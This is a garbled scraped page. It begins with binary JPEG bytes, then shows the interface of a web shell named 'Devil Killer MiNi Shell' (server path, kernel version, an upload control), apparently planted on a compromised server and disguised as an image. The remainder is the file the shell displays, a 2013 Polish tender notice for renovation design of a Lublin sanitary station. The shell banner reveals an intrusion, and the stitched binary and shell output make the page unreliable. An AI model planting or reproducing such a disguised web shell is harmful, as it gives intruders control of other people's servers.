JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130628/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130628/127179-N-2013.html

<p class="kh_header"><b>Lublin: Wykonanie kompletnej wielobranżowej dokumentacji na remont i przebudowę budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Lublinie przy ul. Uniwersyteckiej 12 oraz sprawowanie nadzorów autorskich nad realizacją inwestycji</b><br>
<b>Numer ogłoszenia: 127179 - 2013; data zamieszczenia: 28.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Stacja Sanitarno-Epidemiologiczna , ul. 3 Maja 4, 20-078 Lublin, woj. lubelskie, tel. 0-81 533 80 16, faks 0-81 533 80 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psselubli.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa będąca pomiotem leczniczym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompletnej wielobranżowej dokumentacji na remont i przebudowę budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Lublinie przy ul. Uniwersyteckiej 12 oraz sprawowanie nadzorów autorskich nad realizacją inwestycji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej wielobranżowej dokumentacji na remont i przebudowę budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Lublinie przy ul. Uniwersyteckiej 12 oraz sprawowanie nadzorów autorskich nad realizacją inwestycji.
1.	Zakres zamówienia obejmuje: 
a)	Wykonanie prac przedprojektowych;
b)	Wykonanie prac projektowych;
c)	Pełnienie kompleksowych nadzorów autorskich nad realizacją robót budowlanych prowadzonych w oparciu o dokumentację stanowiącą przedmiot zamówienia.
d)	Pozyskanie we własnym zakresie i na własny koszt wszelkich niezbędnych map, uzgodnień, opinii i pozwoleń projektu w tym z właścicielami infrastruktury technicznej, koniecznych do uzyskania pozwolenia na budowę;
2.	Zakres prac przedprojektowych obejmuje:
a)	Wykonanie oceny stanu technicznego budynku w zakresie wynikającym z obowiązujących w tym zakresie przepisów
b)	Wykonanie inwentaryzacji obiektu dla celów projektowych;
c)	Opracowanie audytu energetycznego (6 egzemplarzy);
d)	Opracowanie koncepcji przebudowy budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Lublinie przy ul. Uniwersyteckiej 12.
3.	Zakres prac projektowych obejmuje:
a)	Wykonanie wielobranżowego projektu budowlanego (6 egzemplarzy) i wykonawczego (6 egzemplarzy) poszczególnych branż;
b)	Opracowanie informacji BIOZ (4 egzemplarze)
c)	Opracowanie Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla każdej branży (4 egzemplarze dla każdej branży)
d)	Opracowanie wykazu scalonych elementów robót dla poszczególnych etapów realizacji robót budowlanych, z uwzględnieniem technologicznej kolejności ich realizacji oraz w sposób umożliwiający dokonanie płatności częściowych za zakończone i odebrane elementy (etapy) robót budowlanych (4 egzemplarze);
e)	Opracowanie kosztorysów inwestorskich we wszystkich branżach (4 egzemplarze dla każdej branży);
f)	Opracowanie przedmiaru robót z pozycją wyceny robót we wszystkich branżach (4 egzemplarze dla każdej branży); Przedmiar robót z pozycją wyceny powinien zawierać dwie niewypełnione dodatkowe kolumny: cena jedn. oraz wartość Ponadto w kolumnie podstawa w każdej pozycji należy podać odpowiedni numer szczegółowej specyfikacji technicznej wykonania i odbioru robót.
4.	Pełnienie kompleksowych nadzorów autorskich nad realizacją robót budowlanych prowadzonych w oparciu o dokumentacje stanowiąca przedmiot zamówienia w zakresie obejmującym w szczególności:
a)	wykonywanie czynności nadzoru autorskiego wynikających z art. 20 ust. 1 pkt. 4 ppkt a) i b) ustawy z dnia 07 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2010 r. Nr 243, poz. 1623 z późn, zm.).
b)	dokonywanie wpisów do dziennika budowy zgodnie z art. 21 ustawy Prawo budowlane oraz zgodnie z § 9 ust. 1 i 2 Rozporządzenia Ministra Infrastruktury z dnia 26.06.2002 r. w sprawie dziennika budowy, montażu i rozbiórki tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia (Dz.U. z 2002 r. Nr 108, poz. 953 z późn. mm).
c)	wyjaśnianie wątpliwości dotyczących rozwiązań zawartych w dokumentacji projektowej pojawiające się w toku realizacji inwestycji;
d)	uzupełnianie szczegółów dokumentacji projektowej;
e)	ścisłą współpracę  ze wszystkimi uczestnikami procesu budowlanego, w szczególności w zakresie dotyczącym:
f)	uzgodnienia możliwości wprowadzenia zmian w dokumentacji projektowej lub rozwiązań równoważnych;
g)	wspomagania nadzoru inwestorskiego w zakresie kontroli (monitorowania) zgodności realizowanych robót budowlanych z dokumentacja projektową;
h)	udział w komisjach odbiorowych i naradach technicznych na budowie.
5.	Ponadto zakres zamówienia obejmuje:
a)	Opracowanie dokumentacji budowlanej (6 egzemplarzy) i wykonawczej (6 egzemplarzy) dotyczącej termomodernizacji budynku jako odrębnego i kompleksowego wielobranżowego opracowania zawierającego także wydzielenie kosztów bezpośrednio związanych z termomodernizacją.
b)	Opracowanie dokumentacji budowlanej (6 egzemplarzy) i wykonawczej (6 egzemplarzy) dotyczącej budowy kanalizacji deszczowej celem odprowadzania wód opadowych z budynku przy ul. Uniwersyteckiej 12 w Lublinie do istniejącej sieci kanalizacji deszczowej jako odrębnego i kompleksowego opracowania zawierającego także wydzielenie kosztów bezpośrednio związanych z wykonaniem tej roboty.
c)	Uzyskanie we własnym zakresie i własny koszt niezbędnych map, opinii, uzgodnień i zatwierdzeń projektów, w tym m.in. w zakresie p.poż., bhp, sanitarno-zdrowotnych wymaganych obowiązującymi w tej materii przepisami.
d)	Przygotowanie kompletnej dokumentacji wraz ze wszystkimi niezbędnymi uzgodnieniami w celu wystąpienia o decyzję o pozwolenie na budowę, zgodnie z obowiązującymi w tej materii przepisami.
6.	Przy wykonywaniu prac projektowych Wykonawca uwzględni uwagi Zamawiającego w zakresie:
a)	użytkowania pomieszczeń wraz ze standardami wykończenia 
b)	technologii pracowni diagnostycznych;
7.	Informacje o stanie istniejącym budynku oraz planowany zakres prac budowlanych
a)	Przedmiotem zamówienia jest istniejący budynek w Lublinie przy ul. Uniwersyteckiej 12, woj. lubelskie (działka nr 42, arkusz 3, obręb 0041). Istniejący obiekt jest użytkowany przez Powiatową Stację Sanitarno - Epidemiologiczną w Lublinie. Budynek jest  wolnostojący, murowany (cegła), podpiwniczony (4-tero kondygnacyjny - piwnica, parter, 2 piętra) z poddaszem o wysokości 1,65m. Kubatura obiektu: 6 514,30m3. Na posesji znajdują się zbiorniki na opał oraz parking. 
8.	Zamawiający planuje wykonanie na poszczególnych kondygnacjach:
a)	piwnica: sala konferencyjna (świetlica), pomieszczenie socjalne pracowników, pomieszczenie informatyka, serwerownia, magazyn informatyka, pomieszczenie gospodarcze sprzątaczek, magazyn odpadów medycznych, magazyn art. biurowych, magazyny gospodarcze, pomieszczenie porządkowe, wymiennikownia, pomieszczenie techniczne, maszynownia windy, wc damski, wc męski, komunikacja, dźwig osobowy.
b)	parter: pomieszczenia biurowe, magazyn szczepionek, pomieszczenie ksero, pomieszczenie magazynowania prób (woda, ss) z zapleczem magazynowym, wc ogólnodostępne, wc dostosowane dla osób niepełnosprawnych, komunikacja, dźwig osobowy.
c)	I piętro: pomieszczenia biurowe (Dyrektor, Z-ca dyrektora, Gł. Księgowa + księgowość, sekretariat, kadry, zamówienia publiczne, Radca Prawny i inne), wc ogólnodostępne, komunikacja, dźwig osobowy.
d)	II piętro: laboratorium (fiz. - chemiczne i mikrobiologiczne z szatnią i pomieszczeniami biurowymi), pomieszczenie gospodarcze, wc personelu, komunikacja, dźwig osobowy.
e)	III piętro (nadbudowa - obecne poddasze): archiwum, magazyn, pomieszczenia biurowe, wc damski, wc męski, komunikacja, pomieszczenie gospodarcze, dźwig osobowy.
9.	Planowany zakres prac budowlanych. Zamawiający planuje:
a)	dostosować obiekt do obowiązujących przepisów p.poż., bhp, sanitarno - zdrowotnych, 
b)	dostępności dla osób niepełnosprawnych, 
c)	docieplenie budynku, wymianę stolarki okiennej i drzwiowej, 
d)	dostosowanie komunikacji poziomej i pionowej - klatki schodowe, windy, podjazdy, pochylnie, 
e)	podwyższenie ścian poddasza z wysokości 1,65m na wysokość  co najmniej 2,70m. 
f)	wymianę konstrukcji i pokrycia dachu, 
g)	likwidację zbędnych zbiorników na opał i  wykonanie na ich miejscu parkingu dla samochodów;
h)	wymianę i wykonanie instalacji c.o. 
i)	wymianę i wykonanie wentylacji (w tym wentylacji w dygestoriach, pomieszczeniach chemii i mikrobiologii);
j)	wykonanie klimatyzacji w pomieszczeniach: magazyn szczepionek, laboratorium chemii i mikrobiologii z uwzględnieniem filtrów mikrobiologicznych, sali konferencyjnej, gabinety dyrektorów, serwerownia i inne - do uzgodnienia na etapie projektowania.
k)	wymianę i wykonanie instalacji wodno-kanalizacyjnej 
l)	wymianę i wykonanie instalacji elektrycznej oraz niskoprądowej w tym monitoring i instalację antywłamaniową, teletechniczną, komputerową, światłowodową;
m)	przebudowę i wykonanie w niezbędnym zakresie sieci i przyłączy wodno - kanalizacyjnych (kanalizacja sanitarna, technologiczna i deszczowa), c.o., energetycznych, światłowodowych i innych niezbędnych do prawidłowego funkcjonowania obiektu.
10.	W przypadku ograniczenia środków, które miały być przeznaczone na dofinansowanie przedmiotu umowy, Zamawiający zastrzega sobie prawo ograniczenia zakresu przedmiotu umowy z jednoczesnym zmniejszeniem wynagrodzenia proporcjonalnie do zmniejszonego zakresu prac projektowych i nadzorów, wyliczonym jako ich procentowy udział w pierwotnie przyjętym zakresie.
11.	O zamiarze ograniczenia zakresu rzeczowego przedmiotu umowy w sytuacji wystąpienia okoliczności, o których mowa w ust. 4 Zamawiający powiadomi Wykonawcę na piśmie w terminie 10 dni od powzięcia wiadomości o okolicznościach uzasadniających ograniczenie zakresu prac.
12.	Dokumentacja projektowa powinna być sporządzona zgodnie z: 
a)	Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z.zm.)
b)	Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462)
c)	Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego: (Dz. U. Nr 202, poz. 2072 z zm.)
d)	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym. (Dz. U. Nr 130, poz. 1389)
e)	Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002, Nr 75, poz. 690)
f)	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 07.06.2010 w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. z 2010 Nr 109, poz. 719)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli, wykonawca wykaże wykonanie minimum 2 projektów budowlano - wykonawczych dotyczących budowy lub przebudowy obiektów o kubaturze co najmniej 5 000,00m3 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni warunek spełniać łącznie. Wykonawcy zgodnie z art. 26 ust. 2b Pzp mogą wykazać spełnianie warunku polegając na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji wykonawca będzie zobowiązany udowodnić Zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawa korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże dysponowanie osobą/osobami posiadającą/ymi odpowiednie uprawnienia budowlane do projektowania w specjalności:
a)	architektonicznej
b)	konstrukcyjni-budowlanej
c)	drogowej
d)	telekomunikacyjnej 
e)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
f)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
Uprawnienia wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578 z późn. zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów. Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r. Nr 63, poz. 394). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni warunek spełniać łącznie. Wykonawcy zgodnie z art. 26 ust. 2b pzp mogą wykazać spełnianie warunku polegając na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek te zostanie spełniony jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00 zł.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni warunek spełniać łącznie. Wykonawcy zgodnie z art. 26 ust. 2b Pzp mogą wykazać spełnianie warunku polegając na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji wykonawca będzie zobowiązany udowodnić Zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawa korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1. Wykaz winien wskazywać wykonanie usług polegających na wykonaniu projektów budowlano-wykonawczych dotyczących budowy lub przebudowy obiektów o kubaturze co najmniej 5 000m3 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
2. Złożone poświadczenia winny potwierdzać należyte wykonanie usług polegających na wykonaniu projektów budowlano-wykonawczych dotyczących budowy lub przebudowy budynków o kubaturze co najmniej 5 000m3 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz oferty - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną (wg załącznika nr 1).
2) Oświadczenie o zakresie przedmiotu zamówienia, który Wykonawca zamierza powierzyć do wykonania podwykonawcom (wg załącznika nr 7) w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom.
3) Parafowany na każdej stronie wzór umowy - stanowiący załącznik Nr 8 do SIWZ.
4) Pisemne zobowiązanie (lub inny dokument) podmiotów opisanych w § 5 pkt. 3 SIWZ do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - o ile dotyczy.
5) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
6)	Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 23 Pzp (dotyczy również wspólników spółki cywilnej). Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza.
